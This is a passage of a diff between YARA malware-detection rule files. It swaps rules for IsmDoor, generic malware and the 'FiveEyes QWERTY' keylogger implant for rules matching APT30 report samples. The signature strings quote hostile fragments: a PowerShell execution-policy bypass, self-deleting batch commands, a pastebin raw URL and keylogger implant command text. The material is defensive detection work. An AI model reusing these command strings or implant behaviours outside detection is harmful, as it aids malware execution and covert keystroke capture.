+		logic_hash = "e6f0edcbf6e0590c8b4a558142053d5938e86d13d65787f02336dc2a173d5963"
+		score = 75
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "fe211c7a081c1dac46e3935f7c614549"
+		hash2 = "8c9db773d387bf9b3f2b6a532e4c937c"
 
 	strings:
-		$x1 = "Hello World!" fullword ascii
-		$x2 = "CONIN$" fullword ascii
-		$s6 = "GetCommandLineA" fullword ascii
-		$s7 = "ExitProcess" fullword ascii
-		$s8 = "CreateFileA" fullword ascii
-		$s5 = "SetConsoleMode" fullword ascii
-		$s9 = "TerminateProcess" fullword ascii
-		$s10 = "GetCurrentProcess" fullword ascii
-		$s11 = "UnhandledExceptionFilter" fullword ascii
-		$s3 = "user32.dll" fullword ascii
-		$s16 = "GetEnvironmentStrings" fullword ascii
-		$s2 = "GetLastActivePopup" fullword ascii
-		$s17 = "GetFileType" fullword ascii
-		$s19 = "HeapCreate" fullword ascii
-		$s20 = "VirtualFree" fullword ascii
-		$s21 = "WriteFile" fullword ascii
-		$s22 = "GetOEMCP" fullword ascii
-		$s23 = "VirtualAlloc" fullword ascii
-		$s24 = "GetProcAddress" fullword ascii
-		$s26 = "FlushFileBuffers" fullword ascii
-		$s27 = "SetStdHandle" fullword ascii
-		$s28 = "KERNEL32.dll" fullword ascii
+		$s0 = "Copyright 2012 Google Inc. All rights reserved." fullword wide
+		$s1 = "(Prxy%c-%s:%u)" fullword ascii
+		$s2 = "Google Inc." fullword wide
 
 	condition:
-		$x1 and $x2 and ( all of ( $s* ) ) and filesize < 35000
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Ismdoor_Jul17_A2 : FILE
+rule SIGNATURE_BASE_APT30_Sample_9 : FILE
 {
 	meta:
-		description = "Detects IsmDoor Malware"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ea72a496-cbc8-56f6-a852-7af9761ea58e"
-		date = "2017-08-01"
+		id = "bf24bb57-aff9-579c-b8a2-265a6d2a06d0"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/Voulnet/status/892104753295110145"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_malware_generic.yar#L54-L71"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L242-L263"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7944f690be190927c905d3b3c6e26765504af9fcfb445cf70c8899af115d5001"
+		hash = "442bf8690401a2087a340ce4a48151c39101652f"
+		logic_hash = "0c5465bdafcbca02f855a0cba1fbb4c19d8d21b714dbe777b942dcd1a7acb257"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "be72c89efef5e59c4f815d2fce0da5a6fac8c90b86ee0e424868d4ae5e550a59"
-		hash2 = "ea1be14eb474c9f70e498c764aaafc8b34173c80cac9a8b89156e9390bd87ba8"
 
 	strings:
-		$s1 = "powershell -exec bypass -file \"" fullword ascii
-		$s2 = "PAQlFcaWUaFkVICEx2CkNCUUpGcA" ascii
-		$s3 = "\\Documents" ascii
-		$s4 = "\\Libraries" ascii
+		$s0 = "\\Windo" ascii
+		$s2 = "oHHOSTR" ascii
+		$s3 = "Softwa]\\Mic" ascii
+		$s4 = "Startup'T" ascii
+		$s6 = "Ora\\%^" ascii
+		$s7 = "\\Ohttp=r" ascii
+		$s17 = "help32Snapshot0L" ascii
+		$s18 = "TimUmoveH" ascii
+		$s20 = "WideChc[lobalAl" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 3 of them )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Unknown_Malware_Sample_Jul17_2 : FILE
+rule SIGNATURE_BASE_APT30_Sample_10 : FILE
 {
 	meta:
-		description = "Detects unknown malware sample with pastebin RAW URL"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ce82b9eb-a9cb-5122-85dc-22794174c2f8"
-		date = "2017-08-01"
+		id = "e5dd6bc9-9383-5d48-92df-709996373655"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/iqH8CK"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_malware_generic.yar#L73-L89"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L264-L283"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "966e14331fa89f2cdb5593a0c10227264085ee127deed28341e395ba6845e19d"
+		hash = "eb518cda3c4f4e6938aaaee07f1f7db8ee91c901"
+		logic_hash = "5a6bd8223fbce133bd11b903edfd7f8ff5a436e26a47c048a5ac606ad4a0b564"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52"
 
 	strings:
-		$s1 = "4System.Web.Services.Protocols.SoapHttpClientProtocol" fullword ascii
-		$s2 = "https://pastebin.com/raw/" wide
-		$s3 = "My.Computer" fullword ascii
-		$s4 = "MyTemplate" fullword ascii
+		$s0 = "Version 4.7.3001" fullword wide
+		$s1 = "Copyright (c) Microsoft Corporation 2004" fullword wide
+		$s2 = "Microsoft(R) is a registered trademark of Microsoft Corporation in the U" wide
+		$s3 = "!! Use Connect Method !!" fullword ascii
+		$s4 = "(Prxy%c-%s:%u)" fullword ascii
+		$s5 = "msmsgs" fullword wide
+		$s18 = "(Prxy-No)" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_MAL_Unspecified_Jan18_1 : FILE
+rule SIGNATURE_BASE_APT30_Sample_11 : FILE
 {
 	meta:
-		description = "Detects unspecified malware sample"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f3187c60-8fff-54de-9918-2fb2301f2d92"
-		date = "2018-01-19"
+		id = "e5dd6bc9-9383-5d48-92df-709996373655"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_malware_generic.yar#L91-L110"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L285-L312"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cd4f7247473e04c348b49970ee3a6fd01415f005ac6dc7a79fbf937a693a80f4"
+		hash = "59066d5d1ee3ad918111ed6fcaf8513537ff49a6"
+		logic_hash = "5e86b53591caa7c783a946205a3d04f91c71294d844e6f6ee88c3bc78e603ea0"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417"
 
 	strings:
-		$s1 = "User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" fullword ascii
-		$s2 = "ping 192.0.2.2 -n 1 -w %d >nul 2>&1" fullword ascii
-		$s3 = "[Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]" fullword ascii
-		$s4 = "start /b \"\" cmd /c del \"%%~f0\"&exit /b" fullword ascii
-		$s5 = "[%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]" fullword ascii
-		$s6 = "%s\\%s.bat" fullword ascii
-		$s7 = "DEL /s \"%s\" >nul 2>&1" fullword ascii
+		$s0 = "System\\CurrentControlSet\\control\\ComputerName\\ComputerName" fullword ascii
+		$s1 = "msofscan.exe" fullword wide
+		$s2 = "Mozilla/4.0 (compatible; MSIE 5.0; Win32)" fullword ascii
+		$s3 = "Microsoft? is a registered trademark of Microsoft Corporation." fullword wide
+		$s4 = "Windows XP Professional x64 Edition or Windows Server 2003" fullword ascii
+		$s9 = "NetEagle_Scout - " fullword ascii
+		$s10 = "Server 4.0, Enterprise Edition" fullword ascii
+		$s11 = "Windows 3.1(Win32s)" fullword ascii
+		$s12 = "%s%s%s %s" fullword ascii
+		$s13 = "Server 4.0" fullword ascii
+		$s15 = "Windows Millennium Edition" fullword ascii
+		$s16 = "msofscan" fullword wide
+		$s17 = "Eagle-Norton360-OfficeScan" fullword ascii
+		$s18 = "Workstation 4.0" fullword ascii
+		$s19 = "2003 Microsoft Office system" fullword wide
 
 	condition:
-		filesize < 300KB and 2 of them
+		filesize < 250KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Fiveeyes_QUERTY_Malwareqwerty_20121
+rule SIGNATURE_BASE_APT30_Sample_12 : FILE
 {
 	meta:
-		description = "FiveEyes QUERTY Malware - file 20121.xml"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bf30bdbb-0153-5ae2-bf42-4bd9e4a2f088"
-		date = "2015-01-18"
+		id = "e5dd6bc9-9383-5d48-92df-709996373655"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "http://www.spiegel.de/media/media-35668.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_querty_fiveeyes.yar#L3-L26"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L314-L329"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8263fb58350f3b1d3c4220a602421232d5e40726"
-		logic_hash = "e2660abf4959bc57bcf9d95d974cd20718d5d27f371109cb4526cee208544530"
+		hash = "b02b5720ff0f73f01eb2ba029a58b645c987c4bc"
+		logic_hash = "997c91267f956bd7d2a7edca9817ebc80bbf1eed944b3bc01cc8bb01927deb1e"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<configFileName>20121_cmdDef.xml</configFileName>" fullword ascii
-		$s1 = "<name>20121.dll</name>" fullword ascii
-		$s2 = "<codebase>\"Reserved for future use.\"</codebase>" fullword ascii
-		$s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii
-		$s4 = "<platform type=\"1\">" fullword ascii
-		$s5 = "</plugin>" fullword ascii
-		$s6 = "</pluginConfig>" fullword ascii
-		$s7 = "<pluginConfig>" fullword ascii
-		$s8 = "</platform>" fullword ascii
-		$s9 = "</lpConfig>" fullword ascii
-		$s10 = "<lpConfig>" fullword ascii
+		$s0 = "Richic" fullword ascii
+		$s1 = "Accept: image/gif, */*" fullword ascii
+		$s2 = "----------------g_nAV=%d,hWnd:0x%X,className:%s,Title:%s,(%d,%d,%d,%d),BOOL=%d" fullword ascii
 
 	condition:
-		9 of them
+		filesize < 250KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Fiveeyes_QUERTY_Malwaresig_20123_Sys
+rule SIGNATURE_BASE_APT30_Sample_13 : FILE
 {
 	meta:
-		description = "FiveEyes QUERTY Malware - file 20123.sys.bin"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0d0e3642-f5d4-59b2-8e56-a7c999e34775"
-		date = "2015-01-18"
+		id = "e5dd6bc9-9383-5d48-92df-709996373655"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "http://www.spiegel.de/media/media-35668.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_querty_fiveeyes.yar#L28-L45"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L331-L349"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a0f0087bd1f8234d5e847363d7e15be8a3e6f099"
-		logic_hash = "881af0e2ff8fad2bca2ae05ad63b5185356181685daafa7a1b9992a1de017c9e"
+		hash = "a359f705a833c4a4254443b87645fd579aa94bcf"
+		logic_hash = "cd5285e8b78493b64704cec21c13d0a017d66936aa8356cfea2aa77c6f87b9e7"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "20123.dll" fullword ascii
-		$s1 = "kbdclass.sys" fullword wide
-		$s2 = "IoFreeMdl" fullword ascii
-		$s3 = "ntoskrnl.exe" fullword ascii
-		$s4 = "KfReleaseSpinLock" fullword ascii
+		$s0 = "msofscan.exe" fullword wide
+		$s1 = "Microsoft? is a registered trademark of Microsoft Corporation." fullword wide
+		$s2 = "Microsoft Office Word Plugin Scan" fullword wide
+		$s3 = "? 2006 Microsoft Corporation.  All rights reserved." fullword wide
+		$s4 = "msofscan" fullword wide
+		$s6 = "2003 Microsoft Office system" fullword wide
 
 	condition:
-		all of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Fiveeyes_QUERTY_Malwaresig_20123_Cmddef
+rule SIGNATURE_BASE_APT30_Sample_14 : FILE
 {
 	meta:
-		description = "FiveEyes QUERTY Malware - file 20123_cmdDef.xml"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "88a29288-9db5-5437-9efe-cdb823a2b928"
-		date = "2015-01-18"
+		id = "e5dd6bc9-9383-5d48-92df-709996373655"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "http://www.spiegel.de/media/media-35668.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_querty_fiveeyes.yar#L47-L80"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L351-L367"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "7b08fc77629f6caaf8cc4bb5f91be6b53e19a3cd"
-		logic_hash = "84776764caa79ad68f2dd0d2f890821c75f2efba7c46d674110ba870a40a372a"
+		hash = "b0740175d20eab79a5d62cdbe0ee1a89212a8472"
+		logic_hash = "e5f352b1aa643b9508c01bbe921197ebd8992ec94036b869c55970f0177164d3"
 		score = 75
-		quality = 83
-		tags = ""
+		quality = 85
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<shortDescription>Keystroke Collector</shortDescription>" fullword ascii
-		$s1 = "This plugin is the E_Qwerty Kernel Mode driver for logging keys.</description>" fullword ascii
-		$s2 = "<commands/>" fullword ascii
-		$s3 = "</version>" fullword ascii
-		$s4 = "<associatedImplantId>20121</associatedImplantId>" fullword ascii
-		$s5 = "<rightsRequired>System or Administrator (if Administrator, I think the DriverIns" ascii
-		$s6 = "<platforms>Windows NT, Windows 2000, Windows XP (32/64 bit), Windows 2003 (32/64" ascii
-		$s7 = "<projectpath>plugin/Collection</projectpath>" fullword ascii
-		$s8 = "<dllDepend>None</dllDepend>" fullword ascii
-		$s9 = "<minorType>0</minorType>" fullword ascii
-		$s10 = "<pluginname>E_QwertyKM</pluginname>" fullword ascii
-		$s11 = "</comments>" fullword ascii
-		$s12 = "<comments>" fullword ascii
-		$s13 = "<majorType>1</majorType>" fullword ascii
-		$s14 = "<files>None</files>" fullword ascii
-		$s15 = "<poc>Erebus</poc>" fullword ascii
-		$s16 = "</plugin>" fullword ascii
-		$s17 = "<team>None</team>" fullword ascii
-		$s18 = "<?xml-stylesheet type=\"text/xsl\" href=\"../XSLT/pluginHTML.xsl\"?>" fullword ascii
-		$s19 = "<pluginsDepend>U_HookManager v1.0, Kernel Covert Store v1.0</pluginsDepend>" fullword ascii
-		$s20 = "<plugin id=\"20123\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi" ascii
+		$s0 = "AdobeReader.exe" fullword wide
+		$s4 = "10.1.7.27" fullword wide
+		$s5 = "Copyright 1984-2012 Adobe Systems Incorporated and its licensors. All ri" wide
+		$s8 = "Adobe Reader" fullword wide
 
 	condition:
-		14 of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Fiveeyes_QUERTY_Malwaresig_20121_Dll
+rule SIGNATURE_BASE_APT30_Sample_15 : FILE
 {
 	meta:
-		description = "FiveEyes QUERTY Malware - file 20121.dll.bin"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a0dc146c-85fd-55b8-a5e0-bfc1f406507e"
-		date = "2015-01-18"
+		id = "e5dd6bc9-9383-5d48-92df-709996373655"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "http://www.spiegel.de/media/media-35668.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_querty_fiveeyes.yar#L82-L96"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L369-L387"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "89504d91c5539a366e153894c1bc17277116342b"
-		logic_hash = "e735a7c26652cbf2bccac80a14568a3582b254ae25e2db56a46c09a714650611"
+		hash = "7a8576804a2bbe4e5d05d1718f90b6a4332df027"
+		logic_hash = "5179f39bdcb064f55479ad147a019dd0b3874783c6bad650e84cfd9d0430bb70"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "WarriorPride\\production2.0\\package\\E_Wzowski" ascii
-		$s1 = "20121.dll" fullword ascii
+		$s0 = "\\Windo" ascii
+		$s2 = "HHOSTR" ascii
+		$s3 = "Softwa]\\Mic" ascii
+		$s4 = "Startup'T" fullword ascii
+		$s17 = "help32Snapshot0L" fullword ascii
+		$s18 = "TimUmoveH" ascii
 
 	condition:
-		all of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Fiveeyes_QUERTY_Malwareqwerty_20123
+rule SIGNATURE_BASE_APT30_Sample_16 : FILE
 {
 	meta:
-		description = "FiveEyes QUERTY Malware - file 20123.xml"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "718d80c9-b6bb-5b73-9c17-49e7d6f77210"
-		date = "2015-01-18"
+		id = "e5dd6bc9-9383-5d48-92df-709996373655"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "http://www.spiegel.de/media/media-35668.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_querty_fiveeyes.yar#L97-L121"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L389-L407"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "edc7228b2e27df9e7ff9286bddbf4e46adb51ed9"
-		logic_hash = "918462399af78b16a8214ceb1d39db554e3136efd4bc643353f0727e4a162516"
+		hash = "066d06ac08b48d3382d46bbeda6ad411b6d6130e"
+		logic_hash = "59ea90ac0590bd87a48fabf1a3fa7ece31560b980b738a34227937bbf82a1c55"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = 60
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<!-- edited with XMLSPY v5 rel. 4 U (http://www.xmlspy.com) by TEAM (RENEGADE) -" ascii
-		$s1 = "<configFileName>20123_cmdDef.xml</configFileName>" fullword ascii
-		$s2 = "<name>20123.sys</name>" fullword ascii
-		$s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii
-		$s4 = "<codebase>/bin/i686-pc-win32/debug</codebase>" fullword ascii
-		$s5 = "<platform type=\"1\">" fullword ascii
-		$s6 = "</plugin>" fullword ascii
-		$s7 = "</pluginConfig>" fullword ascii
-		$s8 = "<pluginConfig>" fullword ascii
-		$s9 = "</platform>" fullword ascii
-		$s10 = "</lpConfig>" fullword ascii
-		$s11 = "<lpConfig>" fullword ascii
+		$s0 = "\\Temp1020.txt" ascii
+		$s1 = "cmcbqyjs" fullword ascii
+		$s2 = "SPVSWh\\" fullword ascii
+		$s4 = "PSShxw@" fullword ascii
+		$s5 = "VWhHw@" fullword ascii
+		$s7 = "SVWhHw@" fullword ascii
 
 	condition:
-		9 of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Fiveeyes_QUERTY_Malwaresig_20120_Dll
+rule SIGNATURE_BASE_APT30_Generic_A : FILE
 {
 	meta:
-		description = "FiveEyes QUERTY Malware - file 20120.dll.bin"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d23ac7bf-3e0c-5b59-a9dc-1ae0a4ae9c02"
-		date = "2015-01-18"
+		id = "6b851d94-d3bd-5c76-8fd0-adb42b3fab73"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "http://www.spiegel.de/media/media-35668.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_querty_fiveeyes.yar#L123-L156"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L409-L429"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "6811bfa3b8cda5147440918f83c40237183dbd25"
-		logic_hash = "fc3aac33c84d3b4a981c2d1a9358c54dc5ceca2017dbf2e2a51e1b6970b90796"
+		logic_hash = "c20660a8a55c6c6cb058fb233e0b29e1e4be2683181dbdfb06e17037d0ed8c31"
 		score = 75
-		quality = 83
-		tags = ""
+		quality = 85
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9f49aa1090fa478b9857e15695be4a89f8f3e594"
+		hash2 = "396116cfb51cee090822913942f6ccf81856c2fb"
+		hash3 = "fef9c3b4b35c226501f7d60816bb00331a904d5b"
+		hash4 = "7c9a13f1fdd6452fb6d62067f958bfc5fec1d24e"
+		hash5 = "5257ba027abe3a2cf397bfcae87b13ab9c1e9019"
 
 	strings:
-		$s0 = "\\QwLog_%d-%02d-%02d-%02d%02d%02d.txt" wide
-		$s1 = "\\QwLog_%d-%02d-%02d-%02d%02d%02d.xml" wide
-		$s2 = "Failed to send the EQwerty_driverStatusCommand to the implant." fullword ascii
-		$s3 = "- Log Used (number of windows) - %d" fullword wide
-		$s4 = "- Log Limit (number of windows) - %d" fullword wide
-		$s5 = "Process or User Default Language" fullword wide
-		$s6 = "Windows 98/Me, Windows NT 4.0 and later: Vietnamese" fullword wide
-		$s7 = "- Logging of keystrokes is switched ON" fullword wide
-		$s8 = "- Logging of keystrokes is switched OFF" fullword wide
-		$s9 = "Qwerty is currently logging active windows with titles containing the fo" wide
-		$s10 = "Windows 95, Windows NT 4.0 only: Korean (Johab)" fullword wide
-		$s11 = "FAILED to get Qwerty Status" fullword wide
-		$s12 = "- Successfully retrieved Log from Implant." fullword wide
-		$s13 = "- Logging of all Windows is toggled ON" fullword wide
-		$s14 = "- Logging of all Windows is toggled OFF" fullword wide
-		$s15 = "Qwerty FAILED to retrieve window list." fullword wide
-		$s16 = "- UNSUCCESSFUL Log Retrieval from Implant." fullword wide
-		$s17 = "The implant failed to return a valid status" fullword ascii
-		$s18 = "- Log files were NOT generated!" fullword wide
-		$s19 = "Windows 2000/XP: Armenian. This is Unicode only." fullword wide
-		$s20 = "- This machine is using a PS/2 Keyboard - Continue on using QWERTY" fullword wide
+		$s5 = "WPVWhhiA" fullword ascii
+		$s6 = "VPWVhhiA" fullword ascii
+		$s11 = "VPhhiA" fullword ascii
+		$s12 = "uUhXiA" fullword ascii
 
 	condition:
-		10 of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Fiveeyes_QUERTY_Malwaresig_20120_Cmddef
+rule SIGNATURE_BASE_APT30_Sample_17 : FILE
 {
 	meta:
-		description = "FiveEyes QUERTY Malware - file 20120_cmdDef.xml"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dfa0693e-4e4c-59c8-9e51-e221aefd8662"
-		date = "2015-01-18"
+		id = "e5dd6bc9-9383-5d48-92df-709996373655"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "http://www.spiegel.de/media/media-35668.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_querty_fiveeyes.yar#L158-L191"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L431-L445"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "cda9ceaf0a39d6b8211ce96307302a53dfbd71ea"
-		logic_hash = "9c336a09adb5fdf3149e5d0ad716cb854f95effa4ce4dfe3e75f43031e4903ff"
+		hash = "c3aa52ff1d19e8fc6704777caf7c5bd120056845"
+		logic_hash = "43913151325fbce993dbfec0acf64ca835b12270c47156ae81b0ce4f32c7bde1"
 		score = 75
-		quality = 83
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$s0 = "This PPC gets the current keystroke log." fullword ascii
-		$s1 = "This command will add the given WindowTitle to the list of Windows to log keys f" ascii
-		$s2 = "This command will remove the WindowTitle corresponding to the given window title" ascii
-		$s3 = "This command will return the current status of the Keyboard Logger (Whether it i" ascii
-		$s4 = "This command Toggles logging of all Keys. If allkeys is toggled all keystrokes w" ascii
-		$s5 = "<definition>Turn logging of all keys on|off</definition>" fullword ascii
-		$s6 = "<name>Get Keystroke Log</name>" fullword ascii
-		$s7 = "<description>Keystroke Logger Lp Plugin</description>" fullword ascii
-		$s8 = "<definition>display help for this function</definition>" fullword ascii
-		$s9 = "This command will switch ON Logging of keys. All keys taht are entered to a acti" ascii
-		$s10 = "Set the log limit (in number of windows)" fullword ascii
-		$s11 = "<example>qwgetlog</example>" fullword ascii
-		$s12 = "<aliasName>qwgetlog</aliasName>" fullword ascii
-		$s13 = "<definition>The title of the Window whose keys you wish to Log once it becomes a" ascii
-		$s14 = "This command will switch OFF Logging of keys. No keystrokes will be captured" fullword ascii
-		$s15 = "<definition>The title of the Window whose keys you no longer whish to log</defin" ascii
-		$s16 = "<command id=\"32\">" fullword ascii
-		$s17 = "<command id=\"3\">" fullword ascii
-		$s18 = "<command id=\"7\">" fullword ascii
-		$s19 = "<command id=\"1\">" fullword ascii
-		$s20 = "<command id=\"4\">" fullword ascii
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s1 = "Nkfvtyvn}]ty}ztU" fullword ascii
+		$s4 = "IEXPL0RE" fullword ascii
 
 	condition:
-		10 of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Fiveeyes_QUERTY_Malwareqwerty_20120
+rule SIGNATURE_BASE_APT30_Sample_18 : FILE
 {
 	meta:
-		description = "FiveEyes QUERTY Malware - file 20120.xml"
